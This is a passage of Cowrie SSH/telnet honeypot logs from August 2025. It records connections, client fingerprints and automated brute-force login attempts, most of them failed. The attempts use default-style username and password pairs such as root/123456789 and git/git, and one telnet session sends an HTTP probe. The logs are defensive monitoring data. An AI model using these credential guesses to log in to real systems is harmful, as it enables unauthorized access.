dsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T06:17:42.514115Z","src_ip":"106.75.163.72","session":"a7827ae96c37"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:42.531768Z","src_ip":"212.227.125.160","session":"1406463bf797"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:43.413723Z","src_ip":"106.75.163.72","session":"a7827ae96c37"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:43.630066Z","src_ip":"106.75.163.72","session":"ed3a0eac7872"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:43.631065Z","src_ip":"106.75.163.72","session":"a7827ae96c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52712,"dst_ip":"1.2.3.4","dst_port":22,"session":"90223b6faeb1","protocol":"ssh","message":"New connection: 212.227.235.229:52712 (1.2.3.4:22) [session: 90223b6faeb1]","sensor":"my-vps","timestamp":"2025-08-28T06:17:46.664039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:46.664729Z","src_ip":"212.227.235.229","session":"90223b6faeb1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:46.952965Z","src_ip":"212.227.235.229","session":"90223b6faeb1"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:49.275736Z","src_ip":"212.227.235.229","session":"90223b6faeb1"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:50.536015Z","src_ip":"212.227.235.229","session":"90223b6faeb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50300,"dst_ip":"1.2.3.4","dst_port":22,"session":"042a525fdf0b","protocol":"ssh","message":"New connection: 212.227.125.160:50300 (1.2.3.4:22) [session: 042a525fdf0b]","sensor":"my-vps","timestamp":"2025-08-28T06:17:52.005622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:52.056172Z","src_ip":"212.227.125.160","session":"042a525fdf0b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:52.153709Z","src_ip":"212.227.125.160","session":"042a525fdf0b"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:52.556667Z","src_ip":"212.227.125.160","session":"042a525fdf0b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:53.695039Z","src_ip":"212.227.125.160","session":"042a525fdf0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60470,"dst_ip":"1.2.3.4","dst_port":22,"session":"8654a1fc9ec1","protocol":"ssh","message":"New connection: 212.227.125.160:60470 (1.2.3.4:22) [session: 8654a1fc9ec1]","sensor":"my-vps","timestamp":"2025-08-28T06:17:56.671168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:56.674686Z","src_ip":"212.227.125.160","session":"8654a1fc9ec1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:56.892045Z","src_ip":"212.227.125.160","session":"8654a1fc9ec1"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:57.749841Z","src_ip":"212.227.125.160","session":"8654a1fc9ec1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:58.968651Z","src_ip":"212.227.125.160","session":"8654a1fc9ec1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36092,"dst_ip":"1.2.3.4","dst_port":22,"session":"e228e541571b","protocol":"ssh","message":"New connection: 212.227.235.229:36092 (1.2.3.4:22) [session: e228e541571b]","sensor":"my-vps","timestamp":"2025-08-28T06:17:59.243905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:59.248475Z","src_ip":"212.227.235.229","session":"e228e541571b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:59.387683Z","src_ip":"212.227.235.229","session":"e228e541571b"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:00.029425Z","src_ip":"212.227.235.229","session":"e228e541571b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51804,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce2d81b23d2","protocol":"ssh","message":"New connection: 212.227.235.229:51804 (1.2.3.4:22) [session: 4ce2d81b23d2]","sensor":"my-vps","timestamp":"2025-08-28T06:18:00.049763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:00.131083Z","src_ip":"212.227.235.229","session":"4ce2d81b23d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:00.355736Z","src_ip":"212.227.235.229","session":"4ce2d81b23d2"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:01.087420Z","src_ip":"212.227.235.229","session":"4ce2d81b23d2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:01.174180Z","src_ip":"212.227.235.229","session":"e228e541571b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:02.234081Z","src_ip":"212.227.235.229","session":"4ce2d81b23d2"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":47982,"dst_ip":"1.2.3.4","dst_port":23,"session":"560d8b888f96","protocol":"telnet","message":"New connection: 3.132.23.201:47982 (1.2.3.4:23) [session: 560d8b888f96]","sensor":"my-vps","timestamp":"2025-08-28T06:18:02.953953Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:02.955168Z","src_ip":"3.132.23.201","session":"560d8b888f96"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:02.955923Z","src_ip":"3.132.23.201","session":"560d8b888f96"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:02.957182Z","src_ip":"3.132.23.201","session":"560d8b888f96"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":47994,"dst_ip":"1.2.3.4","dst_port":23,"session":"2733c9682e75","protocol":"telnet","message":"New connection: 3.132.23.201:47994 (1.2.3.4:23) [session: 2733c9682e75]","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.064185Z"}
{"eventid":"cowrie.session.closed","duration":0.12826895713806152,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.192377Z","src_ip":"3.132.23.201","session":"2733c9682e75"}
{"eventid":"cowrie.session.closed","duration":0.30628108978271484,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.260159Z","src_ip":"3.132.23.201","session":"560d8b888f96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41176,"dst_ip":"1.2.3.4","dst_port":22,"session":"93dc2f8c1765","protocol":"ssh","message":"New connection: 212.227.235.229:41176 (1.2.3.4:22) [session: 93dc2f8c1765]","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.318123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.318939Z","src_ip":"212.227.235.229","session":"93dc2f8c1765"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:03.570960Z","src_ip":"212.227.235.229","session":"93dc2f8c1765"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:04.327080Z","src_ip":"212.227.235.229","session":"93dc2f8c1765"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:05.582787Z","src_ip":"212.227.235.229","session":"93dc2f8c1765"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58238,"dst_ip":"1.2.3.4","dst_port":22,"session":"71c1eecf24d1","protocol":"ssh","message":"New connection: 212.227.125.160:58238 (1.2.3.4:22) [session: 71c1eecf24d1]","sensor":"my-vps","timestamp":"2025-08-28T06:18:13.087965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:13.088879Z","src_ip":"212.227.125.160","session":"71c1eecf24d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:13.317989Z","src_ip":"212.227.125.160","session":"71c1eecf24d1"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:13.989324Z","src_ip":"212.227.125.160","session":"71c1eecf24d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35142,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf796dd28ea","protocol":"ssh","message":"New connection: 212.227.235.229:35142 (1.2.3.4:22) [session: 4cf796dd28ea]","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.206887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.207799Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50292,"dst_ip":"1.2.3.4","dst_port":22,"session":"7899fed461a1","protocol":"ssh","message":"New connection: 212.227.125.160:50292 (1.2.3.4:22) [session: 7899fed461a1]","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.318860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.319717Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.351952Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.424670Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.769919Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
